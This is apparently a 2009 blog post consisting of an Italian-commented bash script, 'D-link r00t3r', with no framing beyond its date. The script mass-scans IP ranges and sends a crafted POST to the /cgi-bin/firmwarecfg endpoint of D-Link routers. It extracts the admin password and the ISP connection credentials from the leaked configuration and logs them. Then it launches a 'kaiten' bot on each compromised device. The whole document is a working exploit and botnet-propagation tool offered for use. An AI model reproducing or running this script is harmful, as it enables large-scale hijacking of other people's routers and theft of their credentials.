Domenica, Febbraio 8, 2009
#!/bin/bash
# djkoock & n\ MAYBE final version
# user&pass della connessione inclusi ;)
function scan {
echo "Lancio lo skanner su: $range con $threadscan"
./pnscan -s -w"OPTIONS * HTTP/1.0\n\n" -r"UNKNOWN 501 " -n$threadscan $range.0.0:$range.255.255 80 > $range.log &
jobs -l >.tmp
joobs=$(cat .tmp);until [ "$joobs" = "" ];do jobs -l >.tmp ;joobs=$(cat .tmp);sleep 1;echo -n ".";done
rm -f .tmp
echo "Finito! Risultati Scan in $range.log"
#exit
for i in $(cat $range.log|cut -d":" -f1)
do
start
done
}
function start {
echo 'POST /cgi-bin/firmwarecfg HTTP/1.1' >> dlink-evilreq
echo 'Host: $i' >> dlink-evilreq
echo 'User-Agent: veryprivateacsor' >> dlink-evilreq
echo 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5' >> dlink-evilreq
echo 'Accept-Language: en-us,en;q=0.5' >> dlink-evilreq
echo 'Accept-Encoding: gzip,deflate' >> dlink-evilreq
echo 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7' >> dlink-evilreq
echo 'Keep-Alive: 300' >> dlink-evilreq
echo 'Connection: keep-alive' >> dlink-evilreq
echo 'Content-Type: multipart/form-data; ' >> dlink-evilreq
echo 'boundary=---------------------------41184676334' >> dlink-evilreq
echo 'Content-Length: 234' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '-----------------------------41184676334' >> dlink-evilreq
echo 'Content-Disposition: form-data; name="config.x"' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '-----------------------------41184676334' >> dlink-evilreq
echo 'Content-Disposition: form-data; name="config.y"' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '' >> dlink-evilreq
echo '-----------------------------41184676334--' >> dlink-evilreq
echo ' ' >> dlink-evilreq
###
### curl -F "config.x=;config.y=" -# http://$i/cgi-bin/firmwarecfg 1> $i.config.xml
### ^^^^ -> this is too slow! O_o 2sec more than...
###
cat dlink-evilreq | nc -w 7 $i 80 | grep password 1> $i.config.xml
rm -f dlink-evilreq
# original method...
# poba=`awk -F '<' '{print $54 }' $i.config.xml | cut -d '>' -f2 | cut -d ' ' -f1`
# if [ `wc -c $i.config.xml | cut -c1` != 0 ]; then
#
# method by djkoock...
totres=$(cat $i.config.xml|sed 's/>/>\n/g'|grep "</username>\|</password>"|grep -v "test</password>"|cut -d"<" -f1)
pass=$(echo "$totres"|head -2|tail -1)
connuser=$(echo "$totres"|tail -2|head -1)
connpass=$(echo "$totres"|tail -1)
if [ "$pass" != "" ];then
echo ''
echo -e "\033[1;32m 0wn3d \033[1;37m $i:$pass \t\t \033[1;32muser-pass:\033[1;37m $connuser:$connpass\033[0m"
echo -e "$i:$pass $connuser $connpass" >> own3d.log
echo -e "\033[1;32m Starting kaiten.. \033[0m"
./startk $i root $pass
rm -f $i.config.xml
else echo -e "\033[1;31m $i patched... \033[0m"
rm -f $i.config.xml
fi
}
options="$1"
shift
# test
echo "D-link r00t3r by djkoock feat nube"
case "$options" in
-r ) if [ -z $2 ];then echo "Specifica i threads minkiu...";exit;fi
range="$1"
threadscan="$2"
paramy0="$3"
scan
exit;;
-f ) filez="$1"
if [ -f $filez ];then
paramy0="$2"
for i in $(awk '{print $1}' $filez)
do
start
done
else
echo "NON E' UN FILE MINKIU'"
exit
fi
exit;;
-i ) echo "Provo a Bukare: $1"
paramy0="$2"
i="$1"
start
exit;;
* ) echo -e "\nUsage: $0 [options] <[<rangeB> <threads>]fileip|ip>"
echo -e "\ntipo => $0 -r 127.0 100 Scanna e Buka un rangeB cn N threads"
echo -e " => $0 -f fileip.txt Buka gli ip contenuti in un file."
echo -e " => $0 -i 192.168.0.1 Buka un ip singolo!"
exit;;
esac
else
i="$1"
start
fi